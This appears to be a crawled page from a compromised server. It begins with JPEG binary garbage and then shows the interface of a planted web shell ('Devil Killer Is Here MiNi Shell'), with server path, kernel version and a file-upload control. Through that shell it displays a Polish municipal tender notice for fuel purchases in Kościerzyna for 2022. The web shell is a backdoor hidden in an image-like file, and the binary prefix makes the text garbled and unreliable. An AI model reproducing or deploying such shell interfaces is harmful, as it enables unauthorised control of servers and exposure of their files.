JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211209/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211209/0030828501-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> „Zakup paliw płynnych na rzecz Zakładu Komunalnego Gminy Kościerzyna w 2022 r.” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">ZAKŁAD KOMUNALNY GMINY KOŚCIERZYNA</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 190597909</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">5</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kościerzyna-Stare Nadleśnictwo</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">83-400</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL637 - Chojnicki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zkgk@koscierzyna.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.koscierzyna.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Zakup paliw płynnych na rzecz Zakładu Komunalnego Gminy Kościerzyna w 2022 r.” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-c07530da-58f5-11ec-8c2d-66c2f1230e9c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00308285</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-12-09</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00002120/06/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.2 Dostawa (zakup) paliw płynnych na rzecz ZKGK w 2022 r.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miniportal.uzp.gov.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniportal.uzp.gov.pl<br/>https://epuap.gov.pl/wps/portal zkgk@kościerzyna.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego,<br/>musiposiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do<br/>formularzy:złożenia, zmiany i wycofania oferty oraz do formularza do komunikacji. 2. Wymagania<br/>techniczne iorganizacyjne wysyłania i odbierania dokumentów elektronicznych, cyfrowych<br/>odwzorowańdokumentów oraz informacji przekazywanych przy ich użyciu zostały opisane w<br/>Regulaminiekorzystania z miniPortalu ttps://miniportal.uzp.gov.pl/WarunkiUslugi oraz Regulaminie<br/>ePUAPhttps://www.gov.pl/web/gov/warunki-korzystania 3. Wykonawca przystępując do<br/>niniejszegopostępowania o udzielenie zamówienia publicznego, akceptuje warunki korzystania z<br/>miniPortalu,określone w Regulaminie miniPortalu oraz zobowiązuje się korzystając z miniPortalu<br/>przestrzegaćpostanowień tego regulaminu. 4. Maksymalny rozmiar plików przesyłanych za<br/>pośrednictwemdedykowanych formularzy do: - złożenia, zmiany i wycofania oferty oraz do komunikacji<br/>wynosi 150 MB- e-mail: zkgk@koscierzyna.pl pojemność jednej wiadomości na skrzynce – do 20 MB5.<br/>Za datęprzekazania dokumentów elektronicznych, cyfrowych odwzorowań dokumentów oraz innych<br/>informacjiprzyjmuje się datę ich przekazania na ePUAP, a w przypadku przekazywania tych<br/>dokumentów orazinformacji za pomocą poczty elektronicznej – datą ich przesłania będzie<br/>potwierdzenie dostarczeniawiadomości zawierającej dokument/informację z serwera pocztowego<br/>Zamawiającego. 6. Wpostępowaniu o udzielenie zamówienia komunikacja pomiędzy Zamawiającym a<br/>Wykonawcami wszczególności składanie dokumentów elektronicznych (innych niż oferta oraz<br/>załączniki do oferty),cyfrowych odwzorowań dokumentów oraz przekazywanie informacji odbywa się<br/>elektronicznie zapośrednictwem dedykowanego formularza dostępnego na ePUAP oraz<br/>udostępnionego przezminiPortal (Formularz do komunikacji). We wszelkiej korespondencji związanej z<br/>niniejszympostępowaniem Zamawiający i Wykonawcy posługują się oznaczeniem sprawy i numerem<br/>ogłoszenia(BZP). Zamawiający może również komunikować się z Wykonawcami za pomocą poczty<br/>elektronicznej, email: zkgk@koscierzyna.pl 7. Dokumenty elektroniczne (inne niż oferta oraz<br/>załącznikido oferty) oraz cyfrowe odwzorowanie dokumentów składane są przez Wykonawcę za<br/>pośrednictwemFormularza do komunikacji jako załączniki. Zamawiający dopuszcza również możliwość<br/>składania w/wdokumentów elektronicznych oraz cyfrowych odwzorowań dokumentów za pomocą<br/>pocztyelektronicznej, na adres email: zkgk@koscierzyna.pl8. Sposób sporządzania dokumentówelektronicznych, cyfrowych odwzorowań dokumentów oraz informacji musi być zgodny z<br/>wymaganiamiokreślonymi w rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w<br/>sprawie sposobusporządzania i przekazywania informacji oraz wymagań technicznych dla<br/>dokumentów elektronicznychoraz środków komunikacji elektronicznej w postępowaniu o udzielenie<br/>zamówienia publicznego lubkonkursu . a)Dokumenty lub oświadczenia, wykonawca składa w oryginale<br/>lub kopii poświadczonej zazgodność z oryginałem w formie elektronicznej, w postaci elektronicznej<br/>opatrzonej podpisemzaufanym lub podpisem osobistym. Jeżeli oryginał dokumentu lub oświadczenia<br/>nie zostałysporządzone w postaci dokumentu elektronicznego, wykonawca może sporządzić i<br/>przekazaćelektroniczną kopię posiadanego dokumentu lub oświadczenia. W przypadku przekazywania<br/>przezwykonawcę elektronicznej kopii dokumentu lub oświadczenia, opatrzenie jej kwalifikowanym<br/>podpisemelektronicznym, podpisem zaufanym lub podpisem osobistym przez wykonawcę jest<br/>równoznaczne zpoświadczeniem elektronicznej kopii dokumentu lub oświadczenia za zgodność z<br/>oryginałem.b)Formaty plików muszą być zgodne z krajowymi Ramami Interoperacyjności<br/>ROZPORZĄDZENIERADY MINISTRÓW z dnia 12 kwietnia 2012 r. w sprawie Krajowych Ram<br/>Interoperacyjności,minimalnych wymagań dla rejestrów publicznych i wymiany informacji w postaci<br/>elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z zapisami rozdziału III SWZ - klauzula<br/>informacyjna RODO</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zgodnie z zapisami rozdziału III SWZ - klauzula<br/>informacyjna RODO</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.10.2021.MS</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Część I: „Zakup paliw płynnych – benzyny bezołowiowej 95 i oleju napędowego na rzecz<br/>Zakładu Komunalnego”<br/>Przedmiotem zamówienia jest zakup paliw na rzecz Zakładu Komunalnego Gminy Kościerzyna<br/>paliw płynnych dla pojazdów i maszyn budowlanych będących w dyspozycji ZKGK o ustalonych<br/>parametrach technicznych w ilości: 1927 litrów benzyny bezołowiowej 95; 44 733 litrów oleju<br/>napędowego.<br/>1.1. Wielkość zamówienia może ulec zmniejszeniu lub zwiększeniu maksymalnie o 20 %, w<br/>zależności od potrzeb Zamawiającego. W przypadku zmniejszenia lub zwiększenia zamówienia<br/>o ilości jak wyżej, strony rozliczą dostawy wg rzeczywiście dostarczonej ilości paliw, a<br/>Wykonawcy oprócz żądania zapłaty ceny nie przysługują żadne inne roszczenia wobec<br/>Zamawiającego<br/>1.2. Miejscem wykonania zamówienia ma być stacja paliw Wykonawcy znajdująca się na terenie<br/>miasta Kościerzyna, przy czym zakup benzyny i oleju napędowego odbywać się będzie poprzez<br/>tankowanie środków transportu i maszyn drogowych bezpośrednio do baków natomiast dla<br/>sprzętu będącego w dyspozycji Zamawiającego odbywać się będzie poprzez tankowanie do<br/>przenośnych kanistrów.<br/>1.3. Cena jednostkowa paliwa brutto nie może być wyższa od ceny obowiązującej na<br/>dystrybutorze w dniu tankowania i pomniejszona o określony w ofercie upust cenowy. Przez cały<br/>okres trwania umowy, upust nie może być niższy od określonego w formularzu ofertowym.<br/>1.4. Fakturę za zakupione paliwo (benzyna 95 i ON) wraz z wykazem ilości pobranego paliwa<br/>dla poszczególnych pojazdów z datą tankowania, nr rejestracyjnym pojazdu i podpisem osoby<br/>tankującej, należy dostarczyć do siedziby zamawiającego najpóźniej w terminie do 7 dnia<br/>miesiąca następującego po upływie każdego miesięcznego okresu rozliczeniowego.<br/>1.5. Za przekroczenie terminu określonego w punkcie 4 naliczona zostanie kara w wysokości<br/>100 zł. za każdy dzień opóźnienia. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">09100000-0 - Paliwa</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">09132100-4 - Benzyna bezołowiowa</p> <p class="mb-0">09134100-8 - Olej napędowy</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Oferta, która przedstawia najkorzystniejszy bilans (maksymalna liczba<br/>przyznanych punktów w oparciu o ustalone kryteria) zostanie uznana za najkorzystniejszą, pozostałe<br/>oferty zostaną sklasyfikowane zgodnie z ilością uzyskanych punktów. Realizacja zamówienia zostanie<br/>powierzona Wykonawcy, który uzyska najwyższą ilość punktów wynikającą ze wzoru:<br/>N = C + T<br/>gdzie:<br/>N – łączna ilość punktów badanej oferty<br/>C – ilość punktów badanej oferty w kryterium cena<br/>T – ilość punktów badanej oferty w kryterium termin płatności faktury</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin płatności faktury</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 2. Część II: „Zakup oleju opałowego lekkiego na rzecz Zakładu Komunalnego Gminy<br/>Kościerzyna”<br/>Przedmiotem zamówienia jest zakup na rzecz Zakładu Komunalnego Gminy Kościerzyna oleju<br/>opałowego lekkiego o ustalonych parametrach technicznych w ilości 9756 litrów.<br/>2.1. Wielkość zamówienia może ulec zmniejszeniu lub zwiększeniu maksymalnie o 20 %, w<br/>zależności od potrzeb Zamawiającego. W przypadku zmniejszenia lub zwiększenia zamówienia<br/>o ilości jak wyżej, strony rozliczą dostawy wg rzeczywiście dostarczonej ilości paliw a<br/>Wykonawcy oprócz żądania zapłaty ceny nie przysługują żadne inne roszczenia wobec<br/>Zamawiającego<br/>2.2. Miejscem wykonania umowy jest siedziba Zakładu Komunalnego Gminy Kościerzyna, Stare<br/>Nadleśnictwo 5 i budynek przy szkole w miejscowości Wąglikowice (ok. 10 km od Kościerzyny).<br/>2.3. Cena jednostkowa oleju opałowego brutto w dniu dostawy nie może być wyższa od ceny<br/>producenta oleju w tym dniu z uwzględnieniem zaproponowanego wskaźnika kalkulacji w<br/>propozycji cenowej, (marża lub upust) przez cały okres trwania umowy.<br/>2.4. Fakturę za dostarczony olej opałowy należy dostarczyć do naszego zakładu najpóźniej w<br/>terminie 7 dni od dostawy. W przypadku, gdy dostawa wypada w ostatnich dniach miesiąca to<br/>najpóźniej w terminie do 7 dnia miesiąca następującego po upływie miesiąca w którym nastąpiła<br/>dostawę oleju.<br/>2.5. Dostawa oleju opałowego odbywać się będzie środkami transportu Dostawcy<br/>2.6. Za przekroczenie terminu określonego w punkcie 4 naliczona zostanie kara w wysokości<br/>100 zł. za każdy dzień opóźnienia. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">09100000-0 - Paliwa</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Oferta, która przedstawia najkorzystniejszy bilans (maksymalna liczba<br/>przyznanych punktów w oparciu o ustalone kryteria) zostanie uznana za najkorzystniejszą, pozostałe<br/>oferty zostaną sklasyfikowane zgodnie z ilością uzyskanych punktów. Realizacja zamówienia zostanie<br/>powierzona Wykonawcy, który uzyska najwyższą ilość punktów wynikającą ze wzoru:<br/>N = C + T<br/>gdzie:<br/>N – łączna ilość punktów badanej oferty<br/>C – ilość punktów badanej oferty w kryterium cena<br/>T – ilość punktów badanej oferty w kryterium termin płatności faktury</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin płatności faktur</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 2.1. Wykonawca uczestniczący w postępowaniu musi spełnić niżej wymienione warunki udziału<br/>w postępowaniu.<br/>1) zdolności do występowania w obrocie gospodarczym:<br/>a) odpisu z właściwego rejestru lub z centralnej ewidencji i informacji o działalności<br/>gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika<br/>to z odrębnych przepisów:<br/>a) Warunek ten zostanie spełniony, jeżeli wykonawca wykaże, że posiada uprawnienia do<br/>wykonywania określonej działalności lub czynności, którzy posiadają aktualną koncesję na<br/>wykonywanie działalności gospodarczej w zakresie obrotu paliwami ciekłymi (zgodnie z ustawą<br/>z dnia 10 kwietnia 1997 r. Prawo energetyczne, Opracowano na podstawie: (Dz. U. 1997 Nr 54<br/>poz. 348, tj. Dz. U. z 2021 r. poz. 716, 868, 1093, 1505, 1642, 1873 ze zm.)<br/>(w przypadku wspólnego ubiegania się wykonawców o zamówienie warunek z ppkt a) zostanie<br/>spełniony, jeżeli co najmniej jeden z wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia posiada uprawnienia do prowadzenia określonej działalności gospodarczej i<br/>zrealizuje dostawy, do których realizacji te uprawnienia są wymagane), 3) sytuacji ekonomicznej lub finansowej – Zamawiający nie określa;<br/>4) zdolności technicznej lub zawodowej:<br/>a) Warunek ten zostanie spełniony, jeżeli wykonawca wykaże:<br/>dla części I: dysponuje co najmniej jedną stacją paliw zlokalizowaną na terenie miasta<br/>Kościerzyna umożliwiającą tankowanie samochodów dostawczych i maszyn wolnobieżnych;<br/>dla części II: dysponuje odpowiednim sprzętem do transportu paliw płynnych (cysterna).<br/>2.2. Wykonawca może w celu potwierdzenia spełniania warunków udziału w postępowaniu lub<br/>kryteriów selekcji, w stosownych sytuacjach oraz w odniesieniu do konkretnego zamówienia, lub<br/>jego części, polegać na zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub<br/>ekonomicznej podmiotów udostępniających zasoby, niezależnie od charakteru prawnego<br/>łączących go z nimi stosunków prawnych.<br/>2.3. Wykonawca, który polega na zdolnościach lub sytuacji podmiotów udostępniających<br/>zasoby, składa, wraz z wnioskiem o dopuszczenie do udziału w postępowaniu albo odpowiednio<br/>wraz z ofertą, zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji<br/>niezbędnych zasobów na potrzeby realizacji danego zamówienia lub inny podmiotowy środek<br/>dowodowy potwierdzający, że wykonawca realizując zamówienie, będzie dysponował<br/>niezbędnymi zasobami tych podmiotów (przykładowe oświadczenie – załącznik nr 6 do SWZ) <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">b) odpis lub informacja z Krajowego Rejestru Sądowego lub Centralnej<br/>Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4, sporządzonych nie<br/>wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub<br/>ewidencji; – wymagania dotyczące podpisania dokumentu elektronicznego wg rozdz. IX pkt 1.<br/>c) kopię aktualnej koncesji na wykonywanie działalności gospodarczej w zakresie obrotu paliwami<br/>ciekłymi (zgodnie z ustawą z dnia 10 kwietnia 1997 r. Prawo energetyczne, Opracowano na podstawie:<br/>(Dz. U. 1997 Nr 54 poz. 348, tj. Dz. U. z 2021 r. poz. 716, 868, 1093, 1505, 1642, 1873 ze zm.) –<br/>wymagania dotyczące podpisania dokumentu elektronicznego wg rozdz. IX pkt 1.<br/>d) oświadczenie o dysponowaniu:<br/>dla części I: dysponuje co najmniej jedną stacją paliw zlokalizowaną na terenie miasta Kościerzyna<br/>umożliwiającą tankowanie samochodów dostawczych i maszyn wolnobieżnych;<br/>dla części II: dysponuje odpowiednim sprzętem do transportu paliw płynnych (cysterna); – 